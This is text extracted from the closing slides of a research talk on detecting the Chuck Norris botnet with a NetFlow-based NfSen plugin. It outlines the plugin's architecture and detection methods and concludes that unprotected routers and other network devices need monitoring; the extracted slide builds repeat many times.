PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
